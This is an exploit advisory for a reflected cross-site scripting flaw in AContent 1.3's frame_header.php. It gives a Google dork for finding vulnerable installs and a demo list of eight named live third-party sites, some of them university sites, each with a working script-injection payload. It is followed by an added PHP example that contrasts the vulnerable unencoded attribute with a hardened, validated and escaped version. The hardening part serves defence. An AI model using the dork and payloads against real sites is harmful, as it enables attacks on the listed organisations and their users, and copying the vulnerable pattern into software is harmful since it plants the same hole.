AContent 1.3 Cross site scripting

2014-01-04 16:58:12
Posted by: Dr.3v1l

########################################################################
#
# Exploit Title: AContent 1.3 Cross site scripting
# Date: 2014 4 January
# Author: Hossein Hezami ( Dr.3v1l )
# Software Link: www.atutor.ca
# Version: 1.3
# Category: webapps
# Google Keywords: inurl:"/frame_header.php?p="
# Tested on: BackTrack5
#
########################################################################
#
# [+] Exploit :
#
# http://<server>/documentation/frame_header.php?p=[XSS]
#
########################################################################
#
# [+] Demo :
#
# www.stanford.edu/group/accessibility/cgi-bin/accessibilitychecker/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.bbqq.co.uk/AContent/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.csidtu.com/AContent/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.lernen.projekt-eloq.de/AContent/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.pulpa.utp.edu.co/AChecker/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.accesibilidad.utp.edu.co/AChecker/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.accessibility.activedition.com/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.merleneotteyhighschool.com/content/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
#
########################################################################
#
# [+] Contact Me :
#
# [email protected]
# [email protected]
# Twitter.com/Doctor_3v1l
# IR.linkedin.com/in/Hossein3v1l
#
########################################################################
# Emperor Team , IeDB , RHH (UnderGround) , IrSecTeam ; BDB Friends
########################################################################
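
The `">` prefix in the payload above indicates that `p` is written into a double-quoted HTML attribute without encoding. The following is an added example, not AContent's source and not part of the original advisory: it puts that pattern beside a hardened form. The function names, the link markup and the allowlist for `p` are assumptions made for illustration.

```php
<?php
// Added example: hypothetical reconstruction, NOT AContent's actual code.
// Assumption: frame_header.php echoes the "p" query parameter into an
// HTML attribute, which is what the "> prefix of the payload implies.

/** Vulnerable pattern: raw request data inside a double-quoted attribute. */
function render_link_vulnerable(string $p): string
{
    return '<a href="index.php?p=' . $p . '" target="_top">Open</a>';
}

/**
 * Hardened pattern:
 *  1. validate $p against the expected shape of a documentation page path,
 *  2. URL-encode it for the query string,
 *  3. HTML-encode the result for the attribute context (quotes included).
 */
function render_link_hardened(string $p, string $default = 'index.php'): string
{
    // Allowlist (assumed): relative path of [A-Za-z0-9_-] segments ending
    // in .php. The D modifier stops "$" from matching before a trailing newline.
    if (!preg_match('#^[A-Za-z0-9_\-]+(/[A-Za-z0-9_\-]+)*\.php$#D', $p)) {
        $p = $default;
    }
    $href = 'index.php?p=' . rawurlencode($p);
    return '<a href="'
         . htmlspecialchars($href, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
         . '" target="_top">Open</a>';
}

// In a real handler, reject non-string input first, e.g.:
//   $p = is_string($_GET['p'] ?? null) ? $_GET['p'] : '';

// Constructed inputs: the payload shape from the advisory and a benign value.
$samples = ['"><script>alert(/3v1l/)</script>', 'general/introduction.php'];

foreach ($samples as $p) {
    echo "input:      $p\n";
    echo "vulnerable: " . render_link_vulnerable($p) . "\n";
    echo "hardened:   " . render_link_hardened($p) . "\n\n";
}
```

Run with the PHP CLI (PHP 7 or later): the vulnerable output contains a closed attribute followed by a live `<script>` element, while the hardened output falls back to the default page and keeps the whole value inside the quoted `href`.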

Fixes

No fixes
